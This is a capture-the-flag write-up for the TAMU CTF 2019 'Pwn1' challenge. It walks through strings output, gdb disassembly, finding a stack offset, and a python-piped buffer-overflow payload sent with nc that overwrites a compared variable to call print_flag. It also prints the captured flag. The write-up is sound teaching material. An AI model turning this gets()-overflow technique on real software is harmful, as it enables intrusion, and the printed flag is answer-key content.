Index

TAMU CTF 2019 Writeups

  1. Pwn
    1. Pwn1
    2. Pwn2
    3. Pwn3
    4. Pwn4
    5. Pwn5
  2. Network/pentest
    1. Stop and listen
    2. Wordpress
    3. Calculator

Pwn1

Challenge Link: nc pwn.tamuctf.com 4321
Difficulty: easy
Binary Link:

This is was an easy challenge.
First I downloded the binary and run it locally.
output:

root@cbm-guru:/home/root/pracCtf/tamuctf# ./pwn1
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
somename
I don't know that! Auuuuuuuugh!

It was asking for name which I don't know so gave anything as input.. and it returns I don't Know message.

I then quickly use strings to get list of all strings available in binary.
output:

root@cbm-guru:/home/root/pracCtf/tamuctf# strings ./pwn1
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
exit
fopen
puts
putchar
stdin
fgets
stdout
__cxa_finalize
setvbuf
_IO_getc
strcmp
__libc_start_main
GLIBC_2.1
GLIBC_2.1.3
GLIBC_2.0
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
UWVS
[^_]
Right. Off you go.
flag.txt
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
Sir Lancelot of Camelot
I don't know that! Auuuuuuuugh!
What... is your quest?
To seek the Holy Grail.
What... is my secret?
;*2$"
GCC: (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7281
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
over_write_var.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
strcmp@@GLIBC_2.0
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
fgets@@GLIBC_2.0
_edata
_IO_getc@@GLIBC_2.0
__x86.get_pc_thunk.dx
__cxa_finalize@@GLIBC_2.1.3
__data_start
puts@@GLIBC_2.0
__gmon_start__
exit@@GLIBC_2.0
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
stdin@@GLIBC_2.0
setvbuf@@GLIBC_2.0
fopen@@GLIBC_2.1
putchar@@GLIBC_2.0
_fp_hw
stdout@@GLIBC_2.0
__bss_start
main
print_flag
__TMC_END__
_ITM_registerTMCloneTable
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment


as you can see there were some intresting strings in output:
flag.txt
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
Sir Lancelot of Camelot
I don't know that! Auuuuuuuugh!
What... is your quest?
To seek the Holy Grail.
What... is my secret?


so i ran binary again but this time use these strings.

root@cbm-guru:/home/root/pracCtf/tamuctf# ./pwn1
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
Sir Lancelot of Camelot
What... is your quest?
To seek the Holy Grail.
What... is my secret?
i don't know

I don't know that! Auuuuuuuugh!

So it seems like we don't have answere of third question.
It is time to fireup gdb and see what is going on. I open this binary in gdb

gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x000004d4 _init
0x00000510 strcmp@plt
0x00000520 gets@plt
0x00000530 fgets@plt
0x00000540 _IO_getc@plt
0x00000550 puts@plt
0x00000560 exit@plt
0x00000570 __libc_start_main@plt
0x00000580 setvbuf@plt
0x00000590 fopen@plt
0x000005a0 putchar@plt
0x000005b0 __cxa_finalize@plt
0x000005b8 __gmon_start__@plt
0x000005c0 _start
0x00000600 __x86.get_pc_thunk.bx
0x00000610 deregister_tm_clones
0x00000650 register_tm_clones
0x000006a0 __do_global_dtors_aux
0x000006f0 frame_dummy
0x000006f9 __x86.get_pc_thunk.dx
0x000006fd print_flag
0x00000779 main
0x000008f0 __libc_csu_init
0x00000950 __libc_csu_fini
0x00000954 _fini

info function tell me that there is main function, print_flag function and many other which i just ignored.

i then get the disassembly of main

gdb-peda$ disassemble main
Dump of assembler code for function main:
0x00000779 <+0>: lea ecx,[esp+0x4]
0x0000077d <+4>: and esp,0xfffffff0
0x00000780 <+7>: push DWORD PTR [ecx-0x4]
0x00000783 <+10>: push ebp
0x00000784 <+11>: mov ebp,esp
0x00000786 <+13>: push ebx
0x00000787 <+14>: push ecx
0x00000788 <+15>: sub esp,0x40
0x0000078b <+18>: call 0x600 <__x86.get_pc_thunk.bx>
0x00000790 <+23>: add ebx,0x1820
0x00000796 <+29>: mov eax,DWORD PTR [ebx+0x44]
0x0000079c <+35>: mov eax,DWORD PTR [eax]
0x0000079e <+37>: push 0x0
0x000007a0 <+39>: push 0x0
0x000007a2 <+41>: push 0x2
0x000007a4 <+43>: push eax
0x000007a5 <+44>: call 0x580 <setvbuf@plt>
0x000007aa <+49>: add esp,0x10
0x000007ad <+52>: mov DWORD PTR [ebp-0xc],0x2
0x000007b4 <+59>: mov DWORD PTR [ebp-0x10],0x0
0x000007bb <+66>: sub esp,0xc
0x000007be <+69>: lea eax,[ebx-0x1620]
0x000007c4 <+75>: push eax
0x000007c5 <+76>: call 0x550 <puts@plt>
0x000007ca <+81>: add esp,0x10
0x000007cd <+84>: sub esp,0xc
0x000007d0 <+87>: lea eax,[ebx-0x15b5]
0x000007d6 <+93>: push eax
0x000007d7 <+94>: call 0x550 <puts@plt>
0x000007dc <+99>: add esp,0x10
0x000007df <+102>: mov eax,DWORD PTR [ebx+0x40]
0x000007e5 <+108>: mov eax,DWORD PTR [eax]
0x000007e7 <+110>: sub esp,0x4
0x000007ea <+113>: push eax
0x000007eb <+114>: push 0x2b
0x000007ed <+116>: lea eax,[ebp-0x3b]
0x000007f0 <+119>: push eax
0x000007f1 <+120>: call 0x530 <fgets@plt>
0x000007f6 <+125>: add esp,0x10
0x000007f9 <+128>: sub esp,0x8
0x000007fc <+131>: lea eax,[ebx-0x159f]
0x00000802 <+137>: push eax
0x00000803 <+138>: lea eax,[ebp-0x3b]
0x00000806 <+141>: push eax
0x00000807 <+142>: call 0x510 <strcmp@plt>
0x0000080c <+147>: add esp,0x10
0x0000080f <+150>: test eax,eax
0x00000811 <+152>: je 0x82f <main+182>
0x00000813 <+154>: sub esp,0xc
0x00000816 <+157>: lea eax,[ebx-0x1584]
0x0000081c <+163>: push eax
0x0000081d <+164>: call 0x550 <puts@plt>
0x00000822 <+169>: add esp,0x10
0x00000825 <+172>: sub esp,0xc
0x00000828 <+175>: push 0x0
0x0000082a <+177>: call 0x560 <exit@plt>
0x0000082f <+182>: sub esp,0xc
0x00000832 <+185>: lea eax,[ebx-0x1564]
0x00000838 <+191>: push eax
0x00000839 <+192>: call 0x550 <puts@plt>
0x0000083e <+197>: add esp,0x10
0x00000841 <+200>: mov eax,DWORD PTR [ebx+0x40]
0x00000847 <+206>: mov eax,DWORD PTR [eax]
0x00000849 <+208>: sub esp,0x4
0x0000084c <+211>: push eax
0x0000084d <+212>: push 0x2b
0x0000084f <+214>: lea eax,[ebp-0x3b]
0x00000852 <+217>: push eax
0x00000853 <+218>: call 0x530 <fgets@plt>
0x00000858 <+223>: add esp,0x10
0x0000085b <+226>: sub esp,0x8
0x0000085e <+229>: lea eax,[ebx-0x154d]
0x00000864 <+235>: push eax
0x00000865 <+236>: lea eax,[ebp-0x3b]
0x00000868 <+239>: push eax
0x00000869 <+240>: call 0x510 <strcmp@plt>
0x0000086e <+245>: add esp,0x10
0x00000871 <+248>: test eax,eax
0x00000873 <+250>: je 0x891 <main+280>
0x00000875 <+252>: sub esp,0xc
0x00000878 <+255>: lea eax,[ebx-0x1584]
0x0000087e <+261>: push eax
0x0000087f <+262>: call 0x550 <puts@plt>
0x00000884 <+267>: add esp,0x10
0x00000887 <+270>: sub esp,0xc
0x0000088a <+273>: push 0x0
0x0000088c <+275>: call 0x560 <exit@plt>
0x00000891 <+280>: sub esp,0xc
0x00000894 <+283>: lea eax,[ebx-0x1534]
0x0000089a <+289>: push eax
0x0000089b <+290>: call 0x550 <puts@plt>
0x000008a0 <+295>: add esp,0x10
0x000008a3 <+298>: sub esp,0xc
0x000008a6 <+301>: lea eax,[ebp-0x3b]
0x000008a9 <+304>: push eax
0x000008aa <+305>: call 0x520 <gets@plt>
0x000008af <+310>: add esp,0x10
0x000008b2 <+313>: cmp DWORD PTR [ebp-0x10],0xdea110c8
0x000008b9 <+320>: jne 0x8c2 <main+329>
0x000008bb <+322>: call 0x6fd <print_flag>
0x000008c0 <+327>: jmp 0x8d4 <main+347>
0x000008c2 <+329>: sub esp,0xc
0x000008c5 <+332>: lea eax,[ebx-0x1584]
0x000008cb <+338>: push eax
0x000008cc <+339>: call 0x550 <puts@plt>
0x000008d1 <+344>: add esp,0x10
0x000008d4 <+347>: mov eax,0x0
0x000008d9 <+352>: lea esp,[ebp-0x8]
0x000008dc <+355>: pop ecx
0x000008dd <+356>: pop ebx
0x000008de <+357>: pop ebp
0x000008df <+358>: lea esp,[ecx-0x4]
0x000008e2 <+361>: ret
End of assembler dump.


there is lot of assembly but important thing was --- at main+305(0xx000008aa <+305>: call 0x520 <gets@plt>) there was a call to gets() and it was the time when program reads the answere of third question. I know that the gets() is vulnerable to bufferoverflow.
Also at main+313(0x000008b2 <+313>: cmp DWORD PTR [ebp-0x10],0xdea110c8) there was a comparision of ebp-0x10 with 0xdea110c8 and if cmp is true it call print_flag function and print_flag just read flag.txt and prints its content which we want to see.
If you analyse the disassembly of main you find that ebp-0x10 is only used one time in main+59(0x000007b4 <+59>: mov DWORD PTR [ebp-0x10],0x0) and 0 is stored in it....but it was compared with some non zero 0xdea110c8 value.
So main+313 is always false compare which we have to alter using bufferoverflow.

Basically we have to overwrite ebp-0x10 with 0xdea110c8 so that cmp at main+313 get true and print_flag get called.
How we do that??
By overflowing buffer when giving answere to third question.
and then by finding the exact offset after which ebp-0x10 is overwritten and then write 0xdea110c8 at ebp-0x10

step one: findind offset
create a non repeating pattern of 100 bytes using gdb and store it in pat.txt

gdb-peda$ pattern_create 100 pat.txt
Writing pattern of 100 chars to filename "pat.txt"

then give this pattern at third question

gdb-peda$ r
Starting program: /home/root/pracCtf/tamuctf/pwn1
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
Sir Lancelot of Camelot
What... is your quest?
To seek the Holy Grail.
What... is my secret?
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
I don't know that! Auuuuuuuugh!

Program received signal SIGSEGV, Segmentation fault.


Program get sidsegv as I expected

now let see what is in EBP

gdb-peda$ i r
eax 0x0 0x0
ecx 0x47414131 0x47414131
edx 0x20 0x20
ebx 0x41634141 0x41634141
esp 0x4741412d 0x4741412d
ebp 0x41413241 0x41413241
esi 0xf7f93000 0xf7f93000
edi 0xf7f93000 0xf7f93000
eip 0x565558e2 0x565558e2 <main+361>
eflags 0x10282 [ SF IF RF ]
cs 0x23 0x23
ss 0x2b 0x2b
ds 0x2b 0x2b
es 0x2b 0x2b
fs 0x0 0x0
gs 0x63 0x63

as you can see ebp contain 0x41413241 which is a pattern from pat.txt... so lets find offset

gdb-peda$ pattern_offset 0x41413241
1094791745 found at offset: 59

as you can offset of ebp is 59. that means character after 59 chars go to ebp
Now we need to find offset of ebp-0x10 so subtract 0x10 from 59. i.e 59 - 16(0x10 in hex) = 43

so 4 chars after 43 chars go straight to ebp-0x10. Now guess what we send required value to ebp-0x10 to get flag.

so final payload look lile
payload:
python -c "s='Sir Lancelot of Camelot\n'+'To seek the Holy Grail.\n'+'A'*43+'\xc8\x10\xa1\xde';print s" | nc pwn.tamuctf.com 4321

run this in terminal and get the flag:-)

root@cbm-guru:/home/root/pracCtf/tamuctf# python -c "s='Sir Lancelot of Camelot\n'+'To seek the Holy Grail.\n'+'A'*43+'\xc8\x10\xa1\xde';print s" | nc pwn.tamuctf.com 4321
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
What... is your quest?
What... is my secret?
Right. Off you go.
gigem{34sy_CC428ECD75A0D392}


flag was “gigem{34sy_CC428ECD75A0D392}”




www.000webhost.com